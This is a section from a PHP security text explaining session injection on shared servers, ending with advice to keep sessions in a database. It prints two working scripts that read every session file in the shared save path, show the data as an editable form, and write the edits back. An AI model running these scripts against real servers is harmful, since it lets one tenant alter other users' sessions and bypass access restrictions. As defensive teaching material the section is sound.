8.3. Session Injection

A similar concern to session exposure is session injection. This type of attack leverages the fact that your web server has write access, in addition to read access, to the session data store. Therefore, a script running under the same web server can potentially allow other users to add, modify, or delete sessions. The following example displays an HTML form that allows users to conveniently modify existing session data:

    <?php

    session_start();

    ?>

    <form action="inject.php" method="POST">

    <?php

    $path = ini_get('session.save_path');
    $handle = dir($path);

    while ($filename = $handle->read())
    {
      if (substr($filename, 0, 5) == 'sess_')
      {
        $sess_data = file_get_contents("$path/$filename");

        if (!empty($sess_data))
        {
          session_decode($sess_data);
          $sess_data = $_SESSION;
          $_SESSION = array();

          $sess_name = substr($filename, 5);
          $sess_name = htmlentities($sess_name, ENT_QUOTES, 'UTF-8');
          echo "<h1>Session [$sess_name]</h1>";

          foreach ($sess_data as $name => $value)
          {
            $name = htmlentities($name, ENT_QUOTES, 'UTF-8');
            $value = htmlentities($value, ENT_QUOTES, 'UTF-8');
            echo "<p>
                  $name:
                  <input type=\"text\"
                  name=\"{$sess_name}[{$name}]\"
                  value=\"$value\" />
                  </p>";
          }

          echo '<br />';
        }
      }
    }

    $handle->close();

    ?>

    <input type="submit" />
    </form>

The inject.php script can perform the modifications indicated in the form:

    <?php

    session_start();

    $path = ini_get('session.save_path');

    /* Each POST field is named after a session file (minus the sess_ prefix)
       and carries that session's new key/value pairs. */
    foreach ($_POST as $sess_name => $sess_data)
    {
      $_SESSION = $sess_data;
      $sess_data = session_encode();

      file_put_contents("$path/sess_$sess_name", $sess_data);
    }

    $_SESSION = array();

    ?>

This type of attack is very dangerous. An attacker can modify not only the session data of your users but also her own session data. This is more powerful than session hijacking because an attacker can choose the desired values of all session data, potentially bypassing access restrictions and other security safeguards.

The best solution to this problem is to store session data in a database. See the previous section for more information.